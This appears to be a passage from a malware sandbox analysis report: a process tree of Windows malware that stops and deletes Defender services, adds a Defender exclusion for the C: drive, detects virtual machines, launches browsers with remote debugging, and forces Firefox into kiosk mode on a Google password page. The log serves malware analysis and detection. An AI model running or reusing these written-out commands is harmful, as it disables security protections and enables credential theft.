        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:4812
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5788
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:2080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:2648
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:5548
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:4984
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:5324
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:3088
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:1304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:3804
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:4260
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:1116
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:4760
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:2032
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:1496
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:3588
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:5140
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:3624
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:3940
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:1744
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:5164
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:1620
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:764
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:1944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:4952
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:652
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:5836
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:4668
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2476
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2796
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:3852
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:4360
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:1492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:4308
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:5668
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:1552
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:4740
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:1452
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:4596
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:1080
- - C:\Users\Admin\AppData\Local\Temp\10341590101\785956b81d.exe
    "C:\Users\Admin\AppData\Local\Temp\10341590101\785956b81d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4348
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10341590101\785956b81d.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      PID:4880
- - C:\Users\Admin\AppData\Local\Temp\10341600101\da26fd5ce6.exe
    "C:\Users\Admin\AppData\Local\Temp\10341600101\da26fd5ce6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10341600101\da26fd5ce6.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4524
- - C:\Users\Admin\AppData\Local\Temp\10341630101\BIm18E9.exe
    "C:\Users\Admin\AppData\Local\Temp\10341630101\BIm18E9.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4344
- - C:\Users\Admin\AppData\Local\Temp\10341640101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10341640101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:5544
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:4808
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1312
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2764
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3448
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        
        PID:3532
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        
        PID:3744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5304
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        
        PID:432
- - C:\Users\Admin\AppData\Local\Temp\10341650101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10341650101\TbV75ZR.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5840
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\10341660101\f73ae_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10341660101\f73ae_003.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: MapViewOfSection
    PID:5216
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:1208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:752
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:1080
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4888
- - C:\Users\Admin\AppData\Local\Temp\10341670101\WLbfHbp.exe
    "C:\Users\Admin\AppData\Local\Temp\10341670101\WLbfHbp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1000
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
      4⤵
      PID:1872
- - C:\Users\Admin\AppData\Local\Temp\10341680101\a899546335.exe
    "C:\Users\Admin\AppData\Local\Temp\10341680101\a899546335.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:13028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:13216
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:13224
- - C:\Users\Admin\AppData\Local\Temp\10341690101\d88b6fe64d.exe
    "C:\Users\Admin\AppData\Local\Temp\10341690101\d88b6fe64d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\10341700101\6850b4c5cd.exe
    "C:\Users\Admin\AppData\Local\Temp\10341700101\6850b4c5cd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:6048
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:6824
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80fc5dcf8,0x7ff80fc5dd04,0x7ff80fc5dd10
        5⤵
        
        PID:6868
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:2
        5⤵
        
        PID:4388
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2208,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2240 /prefetch:3
        5⤵
        
        PID:3928
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:8
        5⤵
        
        PID:5356
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3256,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3560,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3572 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3896,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4468 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:7712
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4688,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7984
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4864,i,18368672829632288373,16293351393525861989,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4892 /prefetch:8
        5⤵
        
        PID:8712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      PID:11104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b8,0x7ff8089ef208,0x7ff8089ef214,0x7ff8089ef220
        5⤵
        
        PID:3876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1980,i,7260862181206061340,10311640513295769019,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:3
        5⤵
        
        PID:5100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2060,i,7260862181206061340,10311640513295769019,262144 --variations-seed-version --mojo-platform-channel-handle=2056 /prefetch:2
        5⤵
        
        PID:12280
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2556,i,7260862181206061340,10311640513295769019,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8
        5⤵
        
        PID:12700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3460,i,7260862181206061340,10311640513295769019,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:12068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,7260862181206061340,10311640513295769019,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:9984
- - C:\Users\Admin\AppData\Local\Temp\10341710101\65f4920f26.exe
    "C:\Users\Admin\AppData\Local\Temp\10341710101\65f4920f26.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:7924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:8140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:8796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:9008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:9164
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:9308
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:9480
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:9528
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27099 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2096 -initialChannelId {19fef556-a66b-41c2-b8bd-ca4eaede2559} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:10404
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2504 -prefsLen 27135 -prefMapHandle 2508 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {9dd5e8f4-0a9b-43ee-8f32-309f4bdb0ad0} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:10592
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3924 -prefsLen 25164 -prefMapHandle 3928 -prefMapSize 270279 -jsInitHandle 3932 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3940 -initialChannelId {22ebe11d-4bc2-439d-810c-bfc20906c1b9} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        
        PID:11244
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4088 -prefsLen 27276 -prefMapHandle 4092 -prefMapSize 270279 -ipcHandle 4180 -initialChannelId {2949f036-36b8-4c2a-9891-a6c685e43db9} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:5540
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2992 -prefsLen 34775 -prefMapHandle 3192 -prefMapSize 270279 -jsInitHandle 2996 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3300 -initialChannelId {6d109489-8017-473d-baf0-9066d35b4bbb} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        
        PID:12240
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4944 -prefsLen 34824 -prefMapHandle 4948 -prefMapSize 270279 -ipcHandle 4956 -initialChannelId {4d84ad04-a2ea-498d-bc6b-c2f33d77e437} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        
        PID:4932
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4484 -prefsLen 32952 -prefMapHandle 3160 -prefMapSize 270279 -jsInitHandle 3164 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2828 -initialChannelId {5940a0fc-cfde-4792-a7ec-104b4633306b} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        
        PID:7568
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2996 -prefsLen 32952 -prefMapHandle 4888 -prefMapSize 270279 -jsInitHandle 4680 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2676 -initialChannelId {eeed00e7-0cc5-44e9-b723-51e4ac3d9f81} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        
        PID:7584
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5688 -prefsLen 32952 -prefMapHandle 5692 -prefMapSize 270279 -jsInitHandle 5696 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5716 -initialChannelId {4762e610-daca-4480-9182-9f03bb543481} -parentPid 9528 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9528" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        
        PID:7640
- - C:\Users\Admin\AppData\Local\Temp\10341720101\f5cf9bfc02.exe
    "C:\Users\Admin\AppData\Local\Temp\10341720101\f5cf9bfc02.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:9656
- - C:\Users\Admin\AppData\Local\Temp\10341730101\d48553d95a.exe
    "C:\Users\Admin\AppData\Local\Temp\10341730101\d48553d95a.exe"
    3⤵
    PID:7460

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0F049E04BF32E8A8664C86F9F13E4B54 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIB5A4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240629265 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4808
- C:\Windows\system32\srtasks.exe
